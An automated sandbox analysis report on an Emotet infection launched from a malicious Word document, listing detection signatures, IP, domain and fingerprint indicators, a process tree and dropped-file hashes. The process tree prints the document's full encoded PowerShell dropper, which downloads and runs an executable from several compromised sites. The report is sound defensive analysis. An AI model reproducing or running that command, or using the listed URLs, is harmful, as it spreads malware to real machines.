6.2.982.exe.493000.2.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
11.2.sortedwatched.exe.5b3000.2.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
11.2.sortedwatched.exe.5b3000.2.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
4.2.982.exe.523000.2.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x611:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
6.2.982.exe.493000.2.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
9.2.sortedwatched.exe.5a3000.2.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.1.sortedwatched.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
10.1.sortedwatched.exe.400000.0.raw.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1e11:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
12.2.sortedwatched.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00
5.1.982.exe.400000.0.unpackEmotetdetect Emotet in memoryJPCERT/CC Incident Response Group
  • 0x1211:$v5a: 69 01 6D 4E C6 41 05 39 30 00 00

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
149.167.86.174http://psicologiagrupal.cl/wp-admin/FILE/eSzL4nhVV/Get hashmaliciousBrowse
    DZB_V176H033B3E4VU_LN.docGet hashmaliciousBrowse
      2019_04- Balance & Payment Report.docGet hashmaliciousBrowse
        2019_04- Balance & Payment Report.docGet hashmaliciousBrowse
          32DOCO214512852.jsGet hashmaliciousBrowse
            198.49.65.242Attachment-8713-G777079.docGet hashmaliciousBrowse
            • urbandogscol.com/wp-content/xiqjp4/
            Attachment-8713-G777079.docGet hashmaliciousBrowse
            • urbandogscol.com/wp-content/xiqjp4/
            Attachment-8713-G777079.docGet hashmaliciousBrowse
            • urbandogscol.com/wp-content/xiqjp4/
            181.164.8.25DZB_V176H033B3E4VU_LN.docGet hashmaliciousBrowse

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              sabiosdelamor.coDZB_V176H033B3E4VU_LN.docGet hashmaliciousBrowse
              • 198.49.65.242
              DZB_V176H033B3E4VU_LN.docGet hashmaliciousBrowse
              • 198.49.65.242

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              unknownInvoice0186.pdfGet hashmaliciousBrowse
              • 192.168.0.40
              P_2038402.xlsxGet hashmaliciousBrowse
              • 192.168.0.44
              bad.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              RFQ.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              100323.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              Copy.pdfGet hashmaliciousBrowse
              • 127.0.0.1
              2.exeGet hashmaliciousBrowse
              • 192.168.0.40
              UPPB502981.docGet hashmaliciousBrowse
              • 192.168.0.44
              Adm_Boleto.via2.comGet hashmaliciousBrowse
              • 192.168.0.40
              00ECF4AD.exeGet hashmaliciousBrowse
              • 192.168.0.40
              PDF_100987464500.exeGet hashmaliciousBrowse
              • 192.168.0.40
              filedata.exeGet hashmaliciousBrowse
              • 192.168.0.40
              .exeGet hashmaliciousBrowse
              • 192.168.1.60
              33redacted@threatwave.comGet hashmaliciousBrowse
              • 192.168.1.71
              unknownInvoice0186.pdfGet hashmaliciousBrowse
              • 192.168.0.40
              P_2038402.xlsxGet hashmaliciousBrowse
              • 192.168.0.44
              bad.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              RFQ.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              100323.pdfGet hashmaliciousBrowse
              • 192.168.0.44
              Copy.pdfGet hashmaliciousBrowse
              • 127.0.0.1
              2.exeGet hashmaliciousBrowse
              • 192.168.0.40
              UPPB502981.docGet hashmaliciousBrowse
              • 192.168.0.44
              Adm_Boleto.via2.comGet hashmaliciousBrowse
              • 192.168.0.40
              00ECF4AD.exeGet hashmaliciousBrowse
              • 192.168.0.40
              PDF_100987464500.exeGet hashmaliciousBrowse
              • 192.168.0.40
              filedata.exeGet hashmaliciousBrowse
              • 192.168.0.40
              .exeGet hashmaliciousBrowse
              • 192.168.1.60
              33redacted@threatwave.comGet hashmaliciousBrowse
              • 192.168.1.71

              JA3 Fingerprints

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              05af1f5ca1b87cc9cc9b25185115607dYour_Purchase_4396143.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Bofa_Charge01312019.xlsmGet hashmaliciousBrowse
              • 198.49.65.242
              C_ACH_02042019.xlsmGet hashmaliciousBrowse
              • 198.49.65.242
              C_ACH_02042019.xlsmGet hashmaliciousBrowse
              • 198.49.65.242
              14308278291.xlsmGet hashmaliciousBrowse
              • 198.49.65.242
              FILEY595000383.docGet hashmaliciousBrowse
              • 198.49.65.242
              FILEY595000383.docGet hashmaliciousBrowse
              • 198.49.65.242
              PO53473.docGet hashmaliciousBrowse
              • 198.49.65.242
              Facture_Num_OFH30703.docGet hashmaliciousBrowse
              • 198.49.65.242
              DOK97159672110.docGet hashmaliciousBrowse
              • 198.49.65.242
              vXZa4D4m4V.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Prepared_Purchase_Info_429458.docGet hashmaliciousBrowse
              • 198.49.65.242
              1704007#U682a#U5f0f#U4f1a#U793e04082.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              62918504564317 .xlsGet hashmaliciousBrowse
              • 198.49.65.242
              571275114140SS .xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Documento.FT.60803.modifiche_societarie.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Documento_081507_FT_20190415_0006009_.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Documento_057496_FT_20190415_0005008_.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              Scanmalta Client Invoice Statements.xlsGet hashmaliciousBrowse
              • 198.49.65.242
              fee-docs.docGet hashmaliciousBrowse
              • 198.49.65.242

              Dropped Files

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              C:\Users\user\982.exeDZB_V176H033B3E4VU_LN.docGet hashmaliciousBrowse

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Startup

                • System is w7_1
                • WINWORD.EXE (PID: 3204 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
                • powershell.exe (PID: 3456 cmdline: powershell -encod JABtAEgASwB3AFIARgA9ACcASgBJAGIAbgB2AGYAbwBMACcAOwAkAGIAMwBhAFMAaQBtADQAXwAgAD0AIAAnADkAOAAyACcAOwAkAEcAdgBIAEsAMgBNAD0AJwBuAF8AdgBQAGoAcgBwACcAOwAkAFEAegBpAEEAQgBCADYATAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYgAzAGEAUwBpAG0ANABfACsAJwAuAGUAeABlACcAOwAkAGoAdwB0ADcAXwBOAD0AJwBaADYARwA2AG8AVABvAFMAJwA7ACQAegBfAG4AZgAwADkAPQAuACgAJwBuAGUAdwAtACcAKwAnAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEUASQBwAFMARwB3AHUAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAGEAYgBpAG8AcwBkAGUAbABhAG0AbwByAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAFYAdAB5AEUAcQBvAEUAbABvAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBlAHUAcgBvAGEAdQBzAGkAbABpAC4AaQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGkASQBGAFMAWABUAFcAbQBOAC8AQABoAHQAdABwAHMAOgAvAC8AbwBwAGUAbAAuAGsAbQAuAHUAYQAvAGIAbABvAGcAcwAvADMAdQBqAHUAXwB0AGkAbwB3AGYAOQBpAC0AMQA0ADkALwBAAGgAdAB0AHAAcwA6AC8ALwBoAGEAYgBsAGEAYgBlAHMAdABvAHAALgBsAGkAdgBlAC8AcgBxAGIAZQA5AHAALwBwAEsAawBMAGkAdQBxAEcAagAvAEAAaAB0AHQAcABzADoALwAvAGQAbwBnAG8AbgBnAHUAbABvAG4AZwAuAHYAbgAvAHcAcAAtAGEAZABtAGkAbgAvAHYAYQBJAEQAZQB5AEQAagAvACcALgAiAHMAUABgAGwAaQBUACIAKAAnAEAAJwApADsAJABYAG4AOQBUAGoAcQBpAD0AJwBXADUANAA4AEcAUABiAGkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAaQBYAEgAaQBXACAAaQBuACAAJABFAEkAcABTAEcAdwB1ACkAewB0AHIAeQB7ACQAegBfAG4AZgAwADkALgAiAGQAYABvAHcAYABOAGAAbABPAEEARABGAEkAbABlACIAKAAkAEMAaQBYAEgAaQBXACwAIAAkAFEAegBpAEEAQgBCADYATAApADsAJABIAEkAaQBIAFcAVwBTAGYAPQAnAGoASAA4AG8ASQBNACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQB6AGkAQQBCAEIANgBMACkALgAiAGwAZQBOAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADMAOAA1ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgB0ACIAKAAkAFEAegBpAEEAQgBCADYATAApADsAJABLAEMAYgBzAGoAawA9ACcAdwBBAHAATQB2AGEAYQAnADsAYgByAGUAYQBrADsAJAB2AGoAbAA4AFEATAB3AD0AJwBRADgAUAB6ADUAbgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABBADEAcwBhAEIAaAA9ACcAUQBpAEIANgA3AHIAaAA0ACcA MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
                  • 982.exe (PID: 3644 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                    • 982.exe (PID: 3668 cmdline: 'C:\Users\user\982.exe' MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                      • 982.exe (PID: 3696 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                        • 982.exe (PID: 3600 cmdline: --4e722ada MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                • mscorsvw.exe (PID: 3528 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe MD5: BD2AE15EFB47E5215B4D0C59EA00C91A)
                • sortedwatched.exe (PID: 3732 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                  • sortedwatched.exe (PID: 3704 cmdline: C:\Windows\system32\sortedwatched.exe MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                    • sortedwatched.exe (PID: 3672 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                      • sortedwatched.exe (PID: 3780 cmdline: --2a75e385 MD5: 3A74A93E7831D0953B5CEFB9C98505F1)
                • cleanup

                Created / dropped Files

                C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_041d84af-7e76-450d-8340-55db3c73c359
                Process:C:\Windows\System32\sortedwatched.exe
                File Type:data
                Size (bytes):2134
                Entropy (8bit):7.082471693816772
                Encrypted:false
                MD5:7B2759997F3D8E28C124D04DC495C0B5
                SHA1:30F9D822FC7B2A2E6A2EC1767949F739BF9CBC4C
                SHA-256:464553C0BA166E1C354DDC6477C6D466584F37E3367442B4653ACFA5D7234B7D
                SHA-512:57858DA819CB6F76C9F5CCAECDC06784F04960E39E78FEBA6E9CECBCC644B8242CE1DD90AB8919133DD789DFDF54A546CAE72EFA54F9E590ACBB013800CDCC43
                Malicious:false
                Reputation:low
                Preview:....................\...................SYSTEM.....................RSA1H.......?...........}...h8...B~k..!.R..<.HN:D...tW....5g.n.xLu5..tI. .q5e.. ........................z..O........E...g@....V..$....,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... .......6..h.N..Z....kN...G..$+..b............. ...r...........^...'-RoZM.#.^.S........O.W..$(.0.4/.v{$.{;..n........T..[..,....)...cB./(2.~...H|.7..f..k...@...I..D?..*....zNJi...............g}d...6.h.QkW.Q.X...6...(]*'.[*G...0.|.\.7..i{........p...``u.....$...B.c.h.....N........n...p.. .....D.p.?....NR.Vo|.ef....x&.D. .`.....B.s].{...:.(.. ....(&..c9.*x. ).s.-.D.S..C.^L....{...PHP...#..N..L.[.u.?N.....v..........M .S;0f...JZ6Wf.....P..)*.#....d`.=.Q..5Y&.o...@...h:..,.S+IGg4..p27..*... !.Ci.W.s.J.uIu.$`2Vk.)...........{,.............z..O........E...g@....V..$........E.x.p.o.r.t. .F.l.a.g....f...... ....|.Q.o..,Y..T.7W..|..p.u....$x............ ..../.........]..+..C?.j.!vg..O..U....O.......Q-....&@
                C:\Users\user\982.exe
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Size (bytes):425472
                Entropy (8bit):6.712476322966454
                Encrypted:false
                MD5:3A74A93E7831D0953B5CEFB9C98505F1
                SHA1:C74D84DE41D9294DA948D3CAACDDED254853E57C
                SHA-256:8743FB2C992EE623779B119C5BB06F9A523E2F335B0E64B8E133C4867295CE3C
                SHA-512:DA385FEAC0E13C7D8F4A7BECC92EDA980D160E0FF570F6193E111D3D5EB14B423CBC8329C146ECA01D27251B83DEB8E3ACE00FD3008935420B5767F1EE195290
                Malicious:true
                Antivirus:
                • Antivirus: Virustotal, Detection: 16%, Browse
                Joe Sandbox View:
                • Filename: DZB_V176H033B3E4VU_LN.doc, Detection: malicious, Browse
                Reputation:low
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z...Z...Z...Z...Z...Z...Z...Z...Z..HZ...Z..^Zu..Z..YZm..Z..IZ...Z..LZ...ZRich...Z........PE..L... k.].............................z............@..................................@............................................... ..z...........................................................05..@...................x...@....................text............................... ..`.rdata..............................@..@.data...Xj.......(..................@....rsrc...z.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\13E77F69.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.286841866831989
                Encrypted:false
                MD5:8C3F121AF11549FD53782F48C92863D3
                SHA1:227F2DB68F6CF48489CF45B6253A95DA2AB0643F
                SHA-256:043D38B5DB46967F5D533DEB42B91BDF0273885C5CE262CA9C67A9A4A9983AF5
                SHA-512:09352127D65F17BF3BA277823DF7FB0A8150FA9C1558C25FF79D13759E33E022E6F17BB7309974E7E14CE75F21A63B22D9237193B6E2322C8E57C656BFB04F46
                Malicious:false
                Reputation:low
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...P....m#..I.u@..u..f!....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2236A463.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:1D6F8498528BC890F9D1F7E62C97FC7F
                SHA1:B4632AAFC6219F49B64B317DB055F489FE4D9F45
                SHA-256:ABD26B7A339B79834B412075E175C9A5EABF5CA54A72DE1B8EA8AEA72B5973F2
                SHA-512:40A570353B9327B0FA9F9E70AD37959AF91181B67084FBA11E0A654BB812BFEBFC074A1DE08504A631A92A9AB9CB4E9DB4101934ADCEF1B22681A26E1DCDA5C1
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...0....m#..I.u@..u\.f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23282B10.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.186201474676835
                Encrypted:false
                MD5:33AA36BEF062419D9E597A3F8B74B112
                SHA1:26210D9DE88E70C17EC205BC721E9A36888D71E7
                SHA-256:DDFF1BFC68E7353E58F228892DBB3809CBCE1362F9512004E4814EB6F4716CF0
                SHA-512:905A7CFB5B9A09B3CDB7E937521776981E992D85BB13D0D0BF80F18B3BA533B54E5F67B1D3D2C0F98C4066FDF027ECBA9FF6AB0F8EEDE51B6ED6C596C911196F
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n...0....&.'.-v@.0vD.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C5693CD.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:19A6FA2277408604E977C82E69985C8F
                SHA1:3CA249BFE7EC0692E32025F329D9C81711416607
                SHA-256:1B1F7FD642D4DE67EB37C28EBAB040F51B64009A14DB698678E78D6E2ED1BBE1
                SHA-512:0BDCCFD75065E1EDD3DBF1E478F9161225CCE52D539BD5E8187A7F7C1F5643867F695FA846B40076D667CB4C0A8125F01D35F2F27FFBFCCBF8786FE46EC12FC2
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC6D560.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.19202389012249
                Encrypted:false
                MD5:0B2B1CB43D0C41B4DC860F15F9BE100B
                SHA1:EC12B6120297397176A0BCC923D451F8012AF73A
                SHA-256:17F15496F05D223F00CF474F82EBB6D8D2D8D4AEBEEA3270EED82C173B1CA89C
                SHA-512:DC14330EDCF351722B80A53E3F6B0F451B2363B64F8211B8972C7B89ECF5C45DF411327419723A348F79D71DB5B729556F2058E86A87634A049A3865504B262D
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v..f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E4E2F6A.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1785803518075975
                Encrypted:false
                MD5:AE2B2DF9253D2FCC2C0E7C0050EA03EE
                SHA1:0D539A73FB33D7BB30AB74C159E5F264AC8E6D7D
                SHA-256:2F0B2BD8F4EB5C834A8AF7AE4F167780A8891F5CB9F8BE2DC0980CB71A3C331C
                SHA-512:023D37070C0C865BB58A09055D91DD59DCB1348C0B1670B9ED47C85D8C3BFA2ED47CD6433D87C36BC9D50C7B802367CB8BCD345EA9DB5BBF5FD8085B9879308B
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0vr.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\346B6F26.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1958963691236155
                Encrypted:false
                MD5:C4B5A00071FB029B90FC7E2B39E29688
                SHA1:2DE333A3B6F71605D595634CC803F4E46694A6A6
                SHA-256:1A6C649A44DB791193674747E1B12AB2D6A5F8CCC495E7CD0D83EB2E2818C475
                SHA-512:E2F4ED6B4253A22C244F7BE373D45789A32DDB32B5F440209C4D192BC384C1E9A22B3435FACFCBBA5708E935BE9ED09D38F9C4B54D37DBE97C794483D5B895A1
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....E....&.'.-v@.0v..f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3776ABB0.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.200681898780499
                Encrypted:false
                MD5:987EC44F0DB7F47F706543612DF34325
                SHA1:3B8282C9478FB02FF805BF793042B2C28C353B44
                SHA-256:8641D94B165FE092700CDAB44A372FDBD964864DDD1313D689BED48B35A9D942
                SHA-512:539484847795354DF9CEFE5DD6A369EB2814AF02B053E83A9793873734D42AE7611D1355964BBC5D100008B29486B6C39D1EE3D5FEA05891F8E6961DA2AAB690
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....G....&.'.-v@.0vK.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B413F79.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2908383477122083
                Encrypted:false
                MD5:69DC5CCF53E2015272464C3E0634038E
                SHA1:D958188C6CE14A46B02CFDF0B19CF6BB1D64D3B5
                SHA-256:30D93A5AEDD28B3BF5D7828D0B991FDE918DF1CF927884BB5ED9777984671D44
                SHA-512:3FEF8443735557F11CA78847EC0BA30613C5E5A90CC743FFE17933CB415706425272EFED07B8D0F1EBA5CB74FFFE3C595D22C49BAEEF576439EB181C5696DD51
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...1..8.#..I.u@..u..fu....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\420D0784.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.184567519044446
                Encrypted:false
                MD5:B22E6EC8E0F7CEBD01036702876D5F5B
                SHA1:0872D4936DB7DC87505AA59FD79807EEEDED6028
                SHA-256:53A55B993345813248369E7F03366D4F29583E250983BBF2EA33ED3AC30C8051
                SHA-512:7AFD1215CC94B8763E8DF26226480D06AB7B6DDF47CAEC7685AE39D6D3FF094D8BFC49AEB6AC0FFFA6360F582553804BF5A98A24D42A7E3C86F6F2F18916130B
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n.........&.'.-v@.0v@.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47489027.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.292538544789153
                Encrypted:false
                MD5:144E77ECF2566E5A422639AF02C91171
                SHA1:85B1E35F07F23204A55DAEA64CB2C2306F61E3E8
                SHA-256:56CE1776683DCBF6E6D57A0BD5C7E9EF07D50041D4380CC94A3EA64F98D3F988
                SHA-512:3D8D415595012AC051135E0673ABC6C812DE70626ABEA2B0D3FDAB692A24CD73CFDE9BF1DF071F28DB9E7E1CB64C60898F86A6DC2CD55924A0FF51C0856EA862
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...p....m#..I.u@..ug.f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\478BF9B5.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:1925A1BA461D79FAAAC473B86C1FE95C
                SHA1:7D13CE9AAD6BC3A0538FBB40DBF0B305D97F1DC5
                SHA-256:D9F295FC18196019436E4B0C3B71AB3E671490A3EEA8DF9093A2C36B17D8938E
                SHA-512:194A10B4739F5D4F54CA448463CE6D4B4B92D3EAB81C941D1404C2994969196D2952C54F1ACE4584CEF23B2FC43B203E4085992478428DDA454E76B3E5653781
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...`7...m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47B60BD2.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.1876948857934857
                Encrypted:false
                MD5:F2C10C9F1A817B04C3CB759A2ECE74DD
                SHA1:5B89CAA941D6F60695D8F2DFFCFE014360635379
                SHA-256:D7C8C67A2F815FB2AD5C7CAC5C3AAB1B6A7884ED9D11A4AFF0CFA0452CDB113E
                SHA-512:2C21AEE4341046480F1CC9EC7D145356493FDD1B0474E9338C1BC6C514DF89AFFE1F932C4511FBE0B97DE5E2DDEECAA86A0FF04210E5788E27FCEE4EDB2C6D32
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.n....G....&.'.-v@.0vo.f.....-.................'...........................
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5273C8EF.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.288034040284648
                Encrypted:false
                MD5:34E5E0AF9BEB16046D5BDA5910A5D365
                SHA1:C36E97C5E1AA454763880A55606E307332AF8156
                SHA-256:AC92552BB32517C7166814787D764EE5CC593772707162A031E9139445B1347F
                SHA-512:4A23EEA03E259FBBF50A75E7767C76C054DFA64D55E925885BD90EBFDBCE9B3B5388D8BF20E11BCB32B939D9153FC95A1F8125BDBA709BDBC1BD2B0ACB533C7E
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A...0....m#..I.u@..u;.fS....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\547645AB.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 28 x 65536 x 0 +5 "\004"
                Size (bytes):444
                Entropy (8bit):3.2970430492936575
                Encrypted:false
                MD5:C74440B1595AAB4849058E1E290D9D6D
                SHA1:E135C229620EA086DBAE3A17689C5DD544CAA9FE
                SHA-256:DB0298A56DA72017CF13281E2465A4B4095F43FA11FF1AE339671045A279D200
                SHA-512:E489F64BFAFF5D614E2287E37BDAC8C22899C1522F081B787289EE3BA727DF769386A2501772EC7E67C4F7A7D516ADE2E01824BD050F2337A2E6076ACA126E59
                Malicious:false
                Preview:......................................................................-.........!.................!.............................-.........!.................!.............................-.........!.................!...................iii.......-.........!.................!.................................................................2......................................@..Calibri.A.......m#..I.u@..u..f.....-.................'.........
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\592348AC.wmf
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                Size (bytes):462
                Entropy (8bit):3.170147126883901
